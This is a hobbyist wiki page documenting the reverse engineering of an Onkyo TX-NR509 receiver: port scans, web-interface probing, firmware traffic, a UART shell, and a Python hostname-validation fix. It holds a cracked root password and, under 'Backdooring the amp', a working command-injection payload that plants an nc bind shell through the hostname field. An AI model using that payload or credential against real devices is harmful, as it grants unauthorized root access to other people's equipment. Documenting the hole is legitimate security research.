 hacker:: [[turmio]]

<<TableOfContents>>
= Onkyo TX-NR509 =

This is the page for my notes on hacking the Onkyo TX-NR509. Everything here is dumped mainly for my own use. See http://www.happyhacking.org/ for more formal text.

 * My goal is to:
  * Get access to a shell (done)
  * Find hidden features (some)
  * Learn how it works :) (pretty much) 

 * If you find something interesting, please contact me by e-mail: mikko.kenttala(ä)gmail.com or via IRC: Turmio@IRCnet

== Links ==
 * Model: http://www.eu.onkyo.com/en/products/tx-nr509-35637.html
 * Software inside: http://www.eu.onkyo.com/downloads/1/2/0/2/0/21966034_49cbbea4e5.pdf
 * Current firmware: http://www.eu.onkyo.com/en/articles/firmware-update-tx-nr509-15-12-2011-53085.html
 * Customer service: http://www.eu.onkyo.com/en/products/tx-nr509-35637.html?tab=Support
 * Service Manual [[attachment:onkyo_tx-nr509_[ET].pdf]]
 * Might be useful [[attachment:onkyo_repair-tips_[ET].pdf]]
 * There might be something useful [[attachment:onkyo_tx-nr1000-service_tips-av-receiver_[ET].pdf]]
 * Decrypting firmware: http://divideoverflow.com/2014/04/decrypting-onkyo-firmware-files/

== Services ==
{{{
$ nmap -A -sT -p 1-65535 10.0.2.137

Starting Nmap 5.21 ( http://nmap.org ) at 2011-09-06 18:08 EEST
Strange error from connect (65):No route to host
Nmap scan report for 10.0.2.137
Host is up (0.015s latency).
Not shown: 59802 filtered ports, 5731 closed ports
PORT     STATE SERVICE         VERSION
80/tcp   open  http?
8888/tcp open  sun-answerbook?
60128/tcp open  unknown
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
}}}

== Web-server ==
=== Basic information ===
 * No authentication
 * http://10.0.2.137/info.cgi [[attachment:info.png]]
 * http://10.0.2.137/station.cgi [[attachment:station.png]]
 * http://10.0.2.137/network.cgi [[attachment:network.png]]
 * http://10.0.2.137/customer_setting/customer_setting.cgi [[attachment:customer.png]]

=== Skipfish findings ===
 * Skipfish found a "secret" page: http://10.0.2.137/config.cgi [[attachment:configpage.png]]

 * Surfing to http://10.0.2.137/station.cgi?page=2147483647 causes this: [[attachment:strange.png]] (the page number should be 0 or 1 for it to work).
  * http://10.0.2.137/station.cgi?page=294967999 <-- resulted in an empty answer:
{{{
$ curl -v "http://10.0.2.137/station.cgi?page=294967999"
* About to connect() to 10.0.2.137 port 80 (#0)
*   Trying 10.0.2.137... connected
* Connected to 10.0.2.137 (10.0.2.137) port 80 (#0)
> GET /station.cgi?page=294967999 HTTP/1.1
> User-Agent: curl/7.21.2 (x86_64-unknown-openbsd4.9) libcurl/7.21.2 OpenSSL/1.0.0a zlib/1.2.3 libidn/1.19
> Host: 10.0.2.137
> Accept: */*
> 
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-type: text/html
< 
* Closing connection #0
}}}

  * The buggy web page saved as HTML: [[/stationHTML]]
== Serial port socket ==
 * Some kind of hack to forward the old serial port to a socket.
  * Wrote some simple test code one night: [[attachment:tOnkyo.py]] (You don't want to use it ;) )
  * You can find the receiver's serial port codes on the internet: [[attachment:onkyo.xls]]

== Serial port and JTAG ==
 * It seems that there is a serial port and JTAG inside.
 {{attachment:jtag-rs232.png}}


=== NET/USB section (this seems to be valid) ===

 {{attachment:uart-rs232-net.png}}



 * Ugly hack to get a shell: [[attachment:IMG_2403.JPG]] and [[attachment:IMG_2405.JPG]]

 * You need an account to get to the shell
  * login:  ''root''   password: ''morimori''   (John the Ripper did the trick)
 
 * [[/BootEnvironment]]
 * [[/Boot-message]]
 * [[/psOutput]]
 * [[/CommandsAvailable]]
 * [[/InfosInside]]

== USB-interface ==
 * You can play MP3s etc. from USB

== UPnP support ==

{{{
$sudo tcpdump  -i en1 -s 65535 -A host 10.0.2.137
18:34:30.134432 IP 10.0.2.137.ssdp > 239.255.255.250.ssdp: UDP, length 345
E..u..@...z.
........l.l.a.dNOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=1801
LOCATION: http://10.0.2.137:8888/upnp_descriptor_0
NT: urn:schemas-upnp-org:service:AVTransport:1
NTS: ssdp:alive
SERVER: Linux/2.6.33-rc4 UPnP/1.0 MediabolicUPnP/1.8.225
USN: uuid:65b0dc02-c3dc-02b9-14d5-0209c3b9ca73::urn:schemas-upnp-org:service:AVTransport:1

}}}
Server header:

{{{
< HTTP/1.1 200 OK
< Content-type: text/xml; charset=utf-8
< Content-length: 3297
< Server: MediabolicMWEB/1.8.225
< Connection: keep-alive
< 
* Connection #0 to host 10.0.2.137 left intact
* Closing connection #0
}}}
{{{
$ lynx --dump "http://10.0.2.137:8888/upnp_descriptor_0"

   10urn:schemas-upnp-org:device:MediaRenderer:1TX-NR509 test
   AAAONKYOhttp://www.onkyo.comAV
   ReceiverTX-NR509TX-NR509http://www.onkyo.comuuid:65b0dc02-c3dc-02b9-14d
   5-0209c3b9ca73urn:schemas-upnp-org:service:RenderingControl:1urn:upnp-o
   rg:serviceId:RenderingControl/upnp_control_0/upnp_event_0/scpd/Renderin
   gControl_1urn:schemas-upnp-org:service:ConnectionManager:1urn:upnp-org:
   serviceId:ConnectionManager/upnp_control_1/upnp_event_1/scpd/Connection
   Manager_1urn:schemas-upnp-org:service:AVTransport:1urn:upnp-org:service
   Id:AVTransport/upnp_control_2/upnp_event_2/scpd/AVTransport_1http://10.
   0.2.137/VEN_1666&DEV_1100&REV_01
   VEN_0033&DEV_000C&REV_01DMR-1.50Multimedia.DMRMS_DigitalMediaDeviceClas
   s_DMR_V001image/jpeg12012024http://10.0.2.137/icon/onkyo_low_120.jpgima
   ge/jpeg484824http://10.0.2.137/icon/onkyo_low_048.jpgimage/jpeg323224ht
   tp://10.0.2.137/icon/onkyo_low_032.jpgimage/png12012024http://10.0.2.13
   7/icon/onkyo_low_120.pngimage/png484824http://10.0.2.137/icon/onkyo_low
   _048.pngimage/png323224http://10.0.2.137/icon/onkyo_low_032.pngMediaDev
   ices01

}}}

=== AMP fetches data from the server ===

{{{
GET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50


14:25:09.292366 IP 10.0.2.137.43029 > 10.0.2.18.2869: Flags [P.], seq 1:173, ack 1, win 2920, options [nop,nop,TS val 328932421 ecr 11972172], length 172
E.....@.@...
...
......5jV..."B....h.g.....
...E...LGET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50


14:25:12.721323 IP 10.0.2.137.43030 > 10.0.2.18.2869: Flags [P.], seq 1:173, ack 1, win 2920, options [nop,nop,TS val 328932764 ecr 11972515], length 172
@.@..p
...
......5n.T}.......h.......
........GET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50

}}}

== Firmware update over network ==
 [[/UpdateFromConsole]]
{{{
10.0.2.137:50127 -> 10.0.0.1:53
  .............avrupd.onkyo.com.....                                         
#
U 10.0.0.1:53 -> 10.0.2.137:50127
  .............avrupd.onkyo.com.....¿.......Q....updsrv¿.¿.......Q...“..L¿...
  ....5Ï...ns1.onkyo.co.jp.¿.......5Ï...ns1.omp.ne¿`¿S......5Ï..“«™N¿p......5
  Ï..“.."                                                                    
####
T 10.0.2.137:51273 -> 210.134.145.76:80 [AP]
  POST /release/cgi/download.cgi HTTP/1.1..Host: avrupd.onkyo.com..Accept: */
  *..User-Agent: AVR/1.0..Content-Type: application/x-www-form-urlencoded..Co
  ntent-Length: 69....hwaddr=00:09:b0:c1:d5:c3&filename=AVR0007/ONKAVR0007_00
  NA00EA00NA.of1                                                             
#
T 210.134.145.76:80 -> 10.0.2.137:51273 [AP]
  HTTP/1.1 200 OK..Server: Apache..Status: 200 OK..Date: Sun, 04 Sep 2011 20:
  09:21 GMT..Content-length: 256..Content-Type: application/octet-stream.....
  BÀW/¡∂.zË;∏∆¸ Ã≠i.I.?2..Æ~,≤¸aœsË.|O..v.J.sN©.P.U∆¬B>….ÔF.ÚË<Dp¨†8.€Á•¥w3.
  BˇW...™LU˝g⁄˙._9 ˛.[ÿ‚@ÿ.B…µ.˙.›◊'J≈.d1p%l..p.ÌØo◊Z...nˇ1ﬁ..?·BR(§Xˆ.R ..J
  ⁄ÿ„Cﬂ)a.3.Ù≥”∂≥.G.mD.u.L..mÈ.U‹5√ÒÚ+y$ƒ‚/n˜ˆ..qM™.]ÌX...cÍ..uU∫º.nY...u.O.≠
  .).W·@⁄ PÁÛ.±ΩÊ›.(..c1r+z'ÀÒN¨                                             
#####

}}}

== Reverse engineering firmware ==
 
 * You can download the image manually from Onkyo's web site (check the links)
 * It is compressed with zip. The zip contains 3 different files:
{{{
$ ls -la
total 22856
drwx------@  5 turmio  staff       170 Sep  6 18:43 .
drwx------+ 26 turmio  staff       884 Sep  6 18:42 ..
-rw-rw-rw-@  1 turmio  staff       256 Aug  4 20:22 ONKAVR0007_00NA00EA00NA.of1
-rw-rw-rw-@  1 turmio  staff    482048 Aug  4 20:22 ONKAVR0007_00NA00EA00NA.of2
-rw-rw-rw-@  1 turmio  staff  11211520 Aug  4 20:24 ONKAVR0007_00NA00EA00NA.of3

}}}

For some reason all 3 files start with this:
{{{
ONKAVR0007_00NA00EA00NA_107$ hexdump -C ONKAVR0007_00NA00EA00NA.of1
00000000  95 42 cb 57 2f c1 b6 0f  7a e8 3b b8 c6 fc ca cc  |.B.W/...z.;.....|
00000010  ad 69 14 49 9a 3f 32 2e  05 ae 7e 2c b2 fc 61 cf  |.i.I.?2...~,..a.|
00000020  73 e8 01 7c 4f 06 19 76  0d 4a 0e 73 4e a9 97 50  |s..|O..v.J.sN..P|
00000030  9f 55 c6 c2 42 3e c9 13  f0 ef 46 0f f2 e8 3c 44  |.U..B>....F...<D|
00000040  70 ac a0 38 02 db e7 a5  b4 77 33 88 42 ff 57 17  |p..8.....w3.B.W.|
00000050  0d 8d aa 4c 55 fd 67 da  fa 17 5f 39 ca fe 0b 5b  |...LU.g..._9...[|
00000060  d8 e2 40 d8 1a 42 c9 b5  9e fa 80 dd d7 27 4a c5  |..@..B.......'J.|
00000070  06 64 31 70 25 6c 09 8d  70 0a ed af 6f d7 5a 0c  |.d1p%l..p...o.Z.|
00000080  82 14 6e ff 31 de 16 96  3f f0 e1 42 52 28 a4 58  |..n.1...?..BR(.X|
00000090  f6 10 52 20 99 9d 4a da  d8 e3 43 df 29 61 08 33  |..R ..J...C.)a.3|
000000a0  88 f4 b3 d3 b6 b3 8a 47  0a 6d 44 97 75 0d 4c 14  |.......G.mD.u.L.|
000000b0  81 6d e9 19 55 dc 35 c3  f1 f2 2b 79 24 c4 e2 2f  |.m..U.5...+y$../|
000000c0  6e f7 f6 07 8b 71 4d aa  9c 5d ed 58 0a 7f 0e 63  |n....qM..].X...c|
000000d0  ea 08 8d 75 55 ba bc 9d  6e 59 0c 83 17 75 0e 4f  |...uU...nY...u.O|
000000e0  0f ad 82 29 99 57 e1 40  da 20 50 e7 f3 1a b1 bd  |...).W.@. P.....|
000000f0  e6 dd 02 28 83 84 63 31  72 2b 7a 27 cb f1 4e ac  |...(..c1r+z'..N.|
00000100

}}}

 * Cannot find any information on the Internet about those headers
 * No human readable data in any of the images

 * The firmware is likely encrypted. Found this in the serial console messages while updating:
{{{
[GetFWBody (CFWPackFile.cpp 464)]  CalcCheckSum match.
[GetFWBody (CFWPackFile.cpp 468)]  Decrypt start.
[GetFWBody (CFWPackFile.cpp 478)]  Decrypt end.
}}}
 * Symbols from {{{nm --demangle -D /opt/onkyo/avr/lib/mod/libupdater.so}}} are available in [[attachment:libupdater.so.symbols]]

 * Disassembling: {{{objdump --demangle -d /opt/onkyo/avr/lib/mod/libupdater.so}}}

 * http://divideoverflow.com/2014/04/decrypting-onkyo-firmware-files/

== Backdooring the amp ==

You can set up a backdoor on your AMP by setting the hostname from the web management interface to ''`nc -l -l -p 9999 -e /bin/ash &`'' and rebooting the amp using the power switch.

After the reboot you can open a telnet or nc connection to port 9999 and you should have shell access.

This bug was reported to Onkyo a long time ago, so it might be fixed in newer versions.
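The backdoor above works because a hostname typed into the web UI ends up in a shell command line. As an added example (my own Python, not the receiver's code, whose hostname handler is not public; I assume it interpolates the value into a shell string), this is the allow-list check and shell-free invocation that would close the hole:

```python
import re
import subprocess

# RFC 1123 label: letters, digits and hyphens, no leading/trailing hyphen, 1-63 chars.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

# Unsafe pattern (assumed to be what the firmware does; shown for contrast, never executed here):
#   os.system("hostname " + name)
# Any shell metacharacter in `name` (backticks, ';', '&', ...) turns it into a second command.

def is_valid_hostname(name):
    """Strict allow-list check: anything a shell could interpret is rejected."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.split("."))

def hostname_argv(name):
    """Build argv for hostname(1); raises ValueError instead of passing bad input on."""
    if not is_valid_hostname(name):
        raise ValueError("rejected hostname: %r" % name)
    return ["hostname", name]

def set_hostname(name, run=subprocess.run):
    """Apply the hostname with no shell involved; `run` is injectable so it can be exercised unprivileged."""
    return run(hostname_argv(name), check=True)
```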

== Attachments ==
<<AttachList>>
 description:: Getting shell from Onkyos AVR with network capabilities
 started:: 2011-09-06
----
CategoryProjekti
